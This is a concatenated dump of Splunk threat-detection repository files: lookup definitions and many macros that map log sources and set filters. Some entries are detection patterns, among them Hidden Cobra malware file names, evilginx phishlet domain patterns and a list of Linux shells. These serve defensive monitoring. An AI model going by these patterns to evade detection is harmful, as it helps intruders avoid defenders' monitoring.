4 | id: 5850e5c3-543c-45b8-8b82-147ed49aba55
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | case_sensitive_match: false
8 | description: abuse.ch SSLBL SSL Certificate Blacklist (SHA1 Fingerprints)
9 | min_matches: 1
10 |
--------------------------------------------------------------------------------
/lookups/suspicious_writes_lookup.csv:
--------------------------------------------------------------------------------
1 | file, note
2 | mssscardprv.ax,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
3 | scardprv.dll,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
4 | wmmvsvc.dll,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
5 |
--------------------------------------------------------------------------------
/lookups/suspicious_writes_lookup.yml:
--------------------------------------------------------------------------------
1 | name: suspicious_writes_lookup
2 | date: 2024-12-23
3 | version: 2
4 | id: 4a189c42-84d1-49b6-817e-7bc59318f960
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of suspicious file names
8 | match_type:
9 | - WILDCARD(file)
10 | min_matches: 1
--------------------------------------------------------------------------------
/lookups/threat_snort_count.yml:
--------------------------------------------------------------------------------
1 | name: threat_snort_count
2 | date: 2025-05-13
3 | version: 1
4 | id: 48a35e07-ed5f-42f9-a5da-b7f2ab892e3c
5 | author: Bhavin Patel, Nasreddine Bencherchali, Splunk
6 | lookup_type: csv
7 | description: A list of threats and the number of distinct Snort IDs that should be fired to create an alert
8 | min_matches: 1
9 |
--------------------------------------------------------------------------------
/lookups/windows_protocol_handlers.yml:
--------------------------------------------------------------------------------
1 | name: windows_protocol_handlers
2 | date: 2024-12-23
3 | version: 2
4 | id: d7a6399f-9f59-4d16-a637-3353e6d4e3d1
5 | author: Splunk Threat Research Team
6 | lookup_type: csv
7 | description: A list of Windows Protocol Handlers
8 | match_type:
9 | - WILDCARD(handler)
10 | min_matches: 1
11 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/windows_suspicious_services.yml:
--------------------------------------------------------------------------------
1 | name: windows_suspicious_services
2 | date: 2025-03-26
3 | version: 2
4 | id: 8c214005-2b4e-49c8-bba6-747005f11296
5 | author: Steven Dick
6 | lookup_type: csv
7 | description: A list of suspicious Windows Service names and locations
8 | match_type:
9 | - WILDCARD(service_name)
10 | - WILDCARD(service_path)
11 | min_matches: 1
12 | max_matches: 1
13 | case_sensitive_match: false
14 |
--------------------------------------------------------------------------------
/lookups/windows_suspicious_tasks.yml:
--------------------------------------------------------------------------------
1 | name: windows_suspicious_tasks
2 | date: 2025-02-07
3 | version: 1
4 | id: 928cba69-be80-4601-9b0d-3ec81f714338
5 | author: Steven Dick
6 | lookup_type: csv
7 | description: A list of suspicious Windows Scheduled Task names and locations
8 | match_type:
9 | - WILDCARD(task_name)
10 | - WILDCARD(task_command)
11 | - WILDCARD(task_arguments)
12 | min_matches: 1
13 | max_matches: 1
14 | case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/zoom_first_time_child_process.yml:
--------------------------------------------------------------------------------
1 | name: zoom_first_time_child_process
2 | date: 2024-12-23
3 | version: 2
4 | id: f5c154e3-b6d8-419c-aff6-863d5e7fd6e5
5 | author: Splunk Threat Research Team
6 | lookup_type: kvstore
7 | description: A list of suspicious file names
8 | fields:
9 | - _key
10 | - dest
11 | - process_name
12 | - firstTimeSeen
13 | - lastTimeSeen
14 |
--------------------------------------------------------------------------------
/macros/admon.yml:
--------------------------------------------------------------------------------
1 | definition: source=ActiveDirectory
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: admon
5 |
--------------------------------------------------------------------------------
/macros/amazon_security_lake.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:asl
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: amazon_security_lake
5 |
--------------------------------------------------------------------------------
/macros/appdynamics_security.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=appdynamics_security
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: appdynamics_security
--------------------------------------------------------------------------------
/macros/aws_cloudwatchlogs_eks.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="aws:cloudwatchlogs:eks"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_cloudwatchlogs_eks
5 |
--------------------------------------------------------------------------------
/macros/aws_config.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:config
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_config
5 |
--------------------------------------------------------------------------------
/macros/aws_description.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="aws:description"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_description
5 |
--------------------------------------------------------------------------------
/macros/aws_ecr_users.yml:
--------------------------------------------------------------------------------
1 | definition: userName IN (user)
2 | description: specify the user allowed to push Images to AWS ECR.
3 | name: aws_ecr_users
4 |
--------------------------------------------------------------------------------
/macros/aws_ecr_users_asl.yml:
--------------------------------------------------------------------------------
1 | definition: actor.user.name IN (admin)
2 | description: specify the user allowed to push Images to AWS ECR.
3 | name: aws_ecr_users_asl
4 |
--------------------------------------------------------------------------------
/macros/aws_s3_accesslogs.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:s3:accesslogs
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_s3_accesslogs
5 |
--------------------------------------------------------------------------------
/macros/aws_securityhub_finding.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="aws:securityhub:finding"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_securityhub_finding
5 |
--------------------------------------------------------------------------------
/macros/aws_securityhub_firehose.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="aws:securityhub:firehose"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: aws_securityhub_firehose
5 |
--------------------------------------------------------------------------------
/macros/azure_audit.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=mscs:azure:audit
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: azure_audit
5 |
--------------------------------------------------------------------------------
/macros/azure_monitor_aad.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=azure:monitor:aad
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: azure_monitor_aad
5 |
--------------------------------------------------------------------------------
/macros/azure_monitor_activity.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=azure:monitor:activity
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: azure_monitor_activity
--------------------------------------------------------------------------------
/macros/azuread.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=mscs:azure:eventhub
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: azuread
5 |
--------------------------------------------------------------------------------
/macros/base64decode.yml:
--------------------------------------------------------------------------------
1 | arguments:
2 | - b64in
3 | definition: 'eval b64x_split=split($b64in$,"")
4 | | lookup char_conversion_matrix base64char as b64x_split OUTPUT base64bin as b64x_bin
5 | | eval b64x_join=mvjoin(b64x_bin,"")
6 | | rex field=b64x_join "(?.{8})" max_match=0
7 | | lookup char_conversion_matrix bin as b64x_by8 output ascii as b64x_out
8 | | eval $b64in$_decode=mvjoin(b64x_out,"")
9 | | fields - b64x_*
10 | | eval $b64in$_decode = replace(replace($b64in$_decode,":NUL:",""),":SPACE:"," ")
11 | | rex field=$b64in$_decode mode=sed "s/\x00//g"'
12 | description: Content based conversion of UTF8/UTF16 based base64 encoding. Not a full implementation, but good enough for context without additional app installation.
13 | name: base64decode
--------------------------------------------------------------------------------
/macros/bootloader_inventory.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype = PwSh:bootloader
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: bootloader_inventory
--------------------------------------------------------------------------------
/macros/brand_abuse_dns.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true brandMonitoring_lookup domain as query OUTPUT domain_abuse
2 | | search domain_abuse=true
3 | description: This macro limits the output to only domains that are in the brand monitoring
4 | lookup file
5 | name: brand_abuse_dns
6 |
--------------------------------------------------------------------------------
/macros/brand_abuse_email.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true brandMonitoring_lookup domain as src_user OUTPUT domain_abuse
2 | | search domain_abuse=true
3 | description: This macro limits the output to only domains that are in the brand monitoring
4 | lookup file
5 | name: brand_abuse_email
6 |
--------------------------------------------------------------------------------
/macros/brand_abuse_web.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true brandMonitoring_lookup domain as urls OUTPUT domain_abuse
2 | | search domain_abuse=true
3 | description: This macro limits the output to only domains that are in the brand monitoring
4 | lookup file
5 | name: brand_abuse_web
6 |
--------------------------------------------------------------------------------
/macros/capi2_operational.yml:
--------------------------------------------------------------------------------
1 | definition: (source=XmlWinEventLog:Microsoft-Windows-CAPI2/Operational)
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: capi2_operational
--------------------------------------------------------------------------------
/macros/certificateservices_lifecycle.yml:
--------------------------------------------------------------------------------
1 | definition: (source=XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational OR source=XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational)
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: certificateservices_lifecycle
--------------------------------------------------------------------------------
/macros/circleci.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=circleci
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: circleci
--------------------------------------------------------------------------------
/macros/cisco_ai_defense.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=cisco:ai:defense
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: cisco_ai_defense
5 |
--------------------------------------------------------------------------------
/macros/cisco_networks.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype=cisco_ios
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: cisco_networks
5 |
--------------------------------------------------------------------------------
/macros/cisco_secure_firewall.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="cisco:sfw:estreamer"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Cisco Secure Firewall Threat Defense logs. Replace the macro definition with configurations for your Splunk Environment.
3 | name: cisco_secure_firewall
4 |
--------------------------------------------------------------------------------
/macros/cisco_secure_firewall_inside_to_outside.yml:
--------------------------------------------------------------------------------
1 | definition: (IngressZone="inside" EgressZone="outside")
2 | description: Replace the macro definition with configurations for your Splunk Environment. IngressZone should represent internal zones and EgressZone should represent the internet or and untrusted zone.
3 | name: cisco_secure_firewall_inside_to_outside
4 |
--------------------------------------------------------------------------------
/macros/cloud_api_calls_from_previously_unseen_user_roles_activity_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far back you should be checking for new commands from user roles
2 | definition: '"-70m@m"'
3 | name: cloud_api_calls_from_previously_unseen_user_roles_activity_window
4 |
--------------------------------------------------------------------------------
/macros/cloudtrail.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:cloudtrail
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: cloudtrail
5 |
--------------------------------------------------------------------------------
/macros/cloudwatch_eks.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="aws:cloudwatchlogs:eks"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch eks logs. Replace the macro definition with configurations for your Splunk Environment.
3 | name: cloudwatch_eks
4 |
--------------------------------------------------------------------------------
/macros/cloudwatch_vpc.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:cloudwatchlogs:vpcflow
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch vpc logs. Replace the macro definition with configurations for your Splunk Environment.
3 | name: cloudwatch_vpc
4 |
--------------------------------------------------------------------------------
/macros/cloudwatchlogs_vpcflow.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:cloudwatchlogs:vpcflow
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: cloudwatchlogs_vpcflow
5 |
--------------------------------------------------------------------------------
/macros/crowdstrike_identities.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=crowdstrike:identities
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: crowdstrike_identities
--------------------------------------------------------------------------------
/macros/crowdstrike_stream.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="CrowdStrike:Event:Streams:JSON"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: crowdstrike_stream
--------------------------------------------------------------------------------
/macros/crushftp.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="crushftp:sessionlogs"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: crushftp
5 |
--------------------------------------------------------------------------------
/macros/driverinventory.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=PwSh:DriverInventory
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: driverinventory
--------------------------------------------------------------------------------
/macros/dynamic_dns_providers.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true dynamic_dns_providers_default dynamic_dns_domains as
2 | query OUTPUTNEW isDynDNS_default | lookup update=true dynamic_dns_providers_local
3 | dynamic_dns_domains as query OUTPUTNEW isDynDNS_local| eval isDynDNS = coalesce(isDynDNS_local,isDynDNS_default)
4 | |fields - isDynDNS_default, isDynDNS_local| search isDynDNS=True
5 | description: This macro limits the output of the query field to dynamic dns domains.
6 | It looks up the domains in a file provided by Splunk and one intended to be updated
7 | by the end user.
8 | name: dynamic_dns_providers
9 |
--------------------------------------------------------------------------------
/macros/dynamic_dns_web_traffic.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true dynamic_dns_providers_default dynamic_dns_domains as
2 | url OUTPUTNEW isDynDNS_default | lookup update=true dynamic_dns_providers_local
3 | dynamic_dns_domains as url OUTPUTNEW isDynDNS_local| eval isDynDNS = coalesce(isDynDNS_default,
4 | isDynDNS_local)|fields - isDynDNS_default, isDynDNS_local| search isDynDNS=True
5 | description: This is a description
6 | name: dynamic_dns_web_traffic
7 |
--------------------------------------------------------------------------------
/macros/ec2_modification_api_calls.yml:
--------------------------------------------------------------------------------
1 | definition: (eventName=AssociateAddress OR eventName=AssociateIamInstanceProfile OR
2 | eventName=AttachClassicLinkVpc OR eventName=AttachNetworkInterface OR eventName=AttachVolume
3 | OR eventName=BundleInstance OR eventName=DetachClassicLinkVpc OR eventName=DetachVolume
4 | OR eventName=ModifyInstanceAttribute OR eventName=ModifyInstancePlacement
5 | OR eventName=MonitorInstances OR eventName=RebootInstances
6 | OR eventName=ResetInstanceAttribute OR eventName=StartInstances OR eventName=StopInstances
7 | OR eventName=TerminateInstances OR eventName=UnmonitorInstances)
8 | description: This is a list of AWS event names that have to do with modifying Amazon
9 | EC2 instances
10 | name: ec2_modification_api_calls
11 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_0365.yml:
--------------------------------------------------------------------------------
1 | definition: (query=login* AND query=www*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as Office 365
4 | name: evilginx_phishlets_0365
5 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_amazon.yml:
--------------------------------------------------------------------------------
1 | definition: (query=fls-na* AND query = www* AND query=images*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as Amazon
4 | name: evilginx_phishlets_amazon
5 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_aws.yml:
--------------------------------------------------------------------------------
1 | definition: (query=www* AND query=aws* AND query=console.aws* AND query=signin.aws*
2 | AND api-northeast-1.console.aws* AND query=fls-na* AND query=images-na*)
3 | description: This limits the query fields to domains that are associated with evilginx
4 | masquerading as an AWS console
5 | name: evilginx_phishlets_aws
6 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_facebook.yml:
--------------------------------------------------------------------------------
1 | definition: (query=www* AND query = m* AND query=static*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as FaceBook
4 | name: evilginx_phishlets_facebook
5 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_github.yml:
--------------------------------------------------------------------------------
1 | definition: (query=api* AND query = github*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as GitHub
4 | name: evilginx_phishlets_github
5 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_google.yml:
--------------------------------------------------------------------------------
1 | definition: (query=accounts* AND query=ssl* AND query=www*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as Google
4 | name: evilginx_phishlets_google
5 |
--------------------------------------------------------------------------------
/macros/evilginx_phishlets_outlook.yml:
--------------------------------------------------------------------------------
1 | definition: (query=outlook* AND query=login* AND query=account*)
2 | description: This limits the query fields to domains that are associated with evilginx
3 | masquerading as Outlook
4 | name: evilginx_phishlets_outlook
5 |
--------------------------------------------------------------------------------
/macros/f5_bigip_rogue.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="f5:bigip:rogue"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: f5_bigip_rogue
--------------------------------------------------------------------------------
/macros/fillnull_config.yml:
--------------------------------------------------------------------------------
1 | definition: "null"
2 | description: Used inside security_content_summariesonly to adjust the fillnull configuration
3 | name: fillnull_config
4 |
--------------------------------------------------------------------------------
/macros/filter_rare_process_allow_list.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true lookup_rare_process_allow_list_default process as process
2 | OUTPUTNEW allow_list | where allow_list="false" | lookup update=true lookup_rare_process_allow_list_local
3 | process as process OUTPUT allow_list | where allow_list="false"
4 | description: This macro is intended to allow_list processes that have been definied
5 | as rare
6 | name: filter_rare_process_allow_list
7 |
--------------------------------------------------------------------------------
/macros/github.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:firehose:json
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: github
--------------------------------------------------------------------------------
/macros/github_enterprise.yml:
--------------------------------------------------------------------------------
1 | definition: source=http:github sourcetype=httpevent
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: github_enterprise
--------------------------------------------------------------------------------
/macros/github_known_users.yml:
--------------------------------------------------------------------------------
1 | definition: user IN (user_names_here)
2 | description: specify the user allowed to create PRs in Github projects.
3 | name: github_known_users
4 |
--------------------------------------------------------------------------------
/macros/github_organizations.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=github:cloud:audit
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: github_organizations
--------------------------------------------------------------------------------
/macros/google_gcp_pubnet_message.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="google:gcp:pubsub:message"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Google GCP. Replace the macro definition with configurations for your Splunk Environment.
3 | name: google_gcp_pubnet_message
4 |
--------------------------------------------------------------------------------
/macros/google_gcp_pubsub_message.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="google:gcp:pubsub:message"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: google_gcp_pubsub_message
5 |
--------------------------------------------------------------------------------
/macros/gsuite_calendar.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=gsuite:calendar:json
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gsuite_calendar
5 |
6 |
--------------------------------------------------------------------------------
/macros/gsuite_drive.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=gsuite:drive:json
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gsuite_drive
5 |
6 |
--------------------------------------------------------------------------------
/macros/gsuite_gmail.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=gsuite:gmail:bigquery
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gsuite_gmail
--------------------------------------------------------------------------------
/macros/gws_login_mfa_methods.yml:
--------------------------------------------------------------------------------
1 | definition: event.parameters{}.multiValue{} IN ("backup_code", "google_authenticator", "google_prompt", "idv_any_phone", "idv_preregistered_phone", "internal_two_factor", "knowledge_employee_id", "knowledge_preregistered_email", "login_location", "knowledge_preregistered_phone", "offline_otp", "security_key", "security_key_otp")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gws_login_mfa_methods
5 |
--------------------------------------------------------------------------------
/macros/gws_reports_admin.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=gws:reports:admin
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gws_reports_admin
5 |
--------------------------------------------------------------------------------
/macros/gws_reports_login.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=gws:reports:login
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: gws_reports_login
5 |
--------------------------------------------------------------------------------
/macros/iis_get_webglobalmodule.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="Pwsh:InstalledIISModules"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: iis_get_webglobalmodule
--------------------------------------------------------------------------------
/macros/iis_operational_logs.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="IIS:Configuration:Operational"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: iis_operational_logs
--------------------------------------------------------------------------------
/macros/important_audit_policy_subcategory_guids.yml:
--------------------------------------------------------------------------------
1 | definition: (SubcategoryGuid IN ("{0CCE922B-69AE-11D9-BED3-505054503030}", "{0CCE9215-69AE-11D9-BED3-505054503030}", "{0CCE922F-69AE-11D9-BED3-505054503030}"))
2 | description: This macro is a placeholder that contains a list of important audit policy sub categories. By default it only monitors the "Audit Audit Policy Change", "Audit Logon" and "Audit Process Creation" sub categories. Customer should modify this macro and add the GUIDs important to them.
3 | name: important_audit_policy_subcategory_guids
4 |
--------------------------------------------------------------------------------
/macros/is_net_windows_file_macro.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true is_net_windows_file filename as process_name OUTPUT netFile | lookup update=true is_net_windows_file originalFileName as original_file_name OUTPUT netFile | search netFile=true
2 | description: This macro limits the output to process names that are .net binaries on Windows Server 2016 and Windows 11.
3 | name: is_net_windows_file_macro
--------------------------------------------------------------------------------
/macros/is_nirsoft_software_macro.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true is_nirsoft_software filename as process_name OUTPUT nirsoftFile | search nirsoftFile=true
2 | description: This macro is related to potentially identifiable software related to NirSoft. Remove or filter as needed based.
3 | name: is_nirsoft_software_macro
--------------------------------------------------------------------------------
/macros/is_windows_system_file_macro.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true is_windows_system_file filename as process_name
2 | OUTPUT systemFile | search systemFile=true
3 | description: This macro limits the output to process names that are in the Windows
4 | System directory
5 | name: is_windows_system_file_macro
6 |
7 |
--------------------------------------------------------------------------------
/macros/ivanti_vtm_audit.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=ivanti_vtm_audit
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: ivanti_vtm_audit
5 |
--------------------------------------------------------------------------------
/macros/kube_allowed_images.yml:
--------------------------------------------------------------------------------
1 | definition: objectRef.name IN (*splunk*, *falco*)
2 | description: Define your images which are allowed to connect to your kubernetes cluster.
3 | name: kube_allowed_images
4 |
--------------------------------------------------------------------------------
/macros/kube_allowed_locations.yml:
--------------------------------------------------------------------------------
1 | definition: Country="United States"
2 | description: Define your locations which are allowed to connect to your kubernetes cluster.
3 | name: kube_allowed_locations
4 |
--------------------------------------------------------------------------------
/macros/kube_allowed_user_agents.yml:
--------------------------------------------------------------------------------
1 | definition: userAgent=Helm/3.13.2
2 | description: Define your user agents which are allowed to connect to your kubernetes cluster.
3 | name: kube_allowed_user_agents
4 |
--------------------------------------------------------------------------------
/macros/kube_allowed_user_groups.yml:
--------------------------------------------------------------------------------
1 | definition: user.groups{} IN (admin)
2 | description: Define your user groups which are allowed to connect to your kubernetes cluster.
3 | name: kube_allowed_user_groups
4 |
--------------------------------------------------------------------------------
/macros/kube_allowed_user_names.yml:
--------------------------------------------------------------------------------
1 | definition: user.username=admin
2 | description: Define your user names which are allowed to connect to your kubernetes cluster.
3 | name: kube_allowed_user_names
4 |
--------------------------------------------------------------------------------
/macros/kube_audit.yml:
--------------------------------------------------------------------------------
1 | definition: source="kubernetes"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes audit data. Replace the macro definition with configurations for your Splunk Environment.
3 | name: kube_audit
4 |
--------------------------------------------------------------------------------
/macros/kube_container_falco.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="kube:container:falco"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes audit data. Replace the macro definition with configurations for your Splunk Environment.
3 | name: kube_container_falco
4 |
--------------------------------------------------------------------------------
/macros/kube_objects_events.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=kube:objects:events
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: kube_objects_events
5 |
--------------------------------------------------------------------------------
/macros/kubernetes_azure.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=mscs:storage:blob:json
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes data from Azure. Replace the macro definition with configurations for your Splunk Environment.
3 | name: kubernetes_azure
4 |
--------------------------------------------------------------------------------
/macros/kubernetes_container_controller.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=kube:container:controller
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes data. Replace the macro definition with configurations for your Splunk Environment.
3 | name: kubernetes_container_controller
4 |
--------------------------------------------------------------------------------
/macros/kubernetes_metrics.yml:
--------------------------------------------------------------------------------
1 | definition: index=kubernetes_metrics
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: kubernetes_metrics
5 |
--------------------------------------------------------------------------------
/macros/linux_auditd.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="auditd"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: linux_auditd
--------------------------------------------------------------------------------
/macros/linux_auditd_normalized_execve_process.yml:
--------------------------------------------------------------------------------
1 | definition: 'type=EXECVE | eval relevant_fields=if(type="EXECVE", "", relevant_fields) | foreach a* [eval relevant_fields=if(type="EXECVE", mvappend(relevant_fields, ''<>''), relevant_fields)] | eval process_exec=if(type="EXECVE", mvjoin(relevant_fields, " "), process_exec) | eval process_exec=if(type="EXECVE", trim(process_exec), process_exec)'
2 | description: customer specific splunk configurations to normalized auditd PROCTITLE type to recover process commandline.
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: linux_auditd_normalized_execve_process
--------------------------------------------------------------------------------
/macros/linux_hosts.yml:
--------------------------------------------------------------------------------
1 | definition: index=unix
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: linux_hosts
--------------------------------------------------------------------------------
/macros/linux_shells.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name IN ("sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell"))
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: linux_shells
5 |
--------------------------------------------------------------------------------
/macros/moveit_sftp_logs.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="sftp_server_logs"
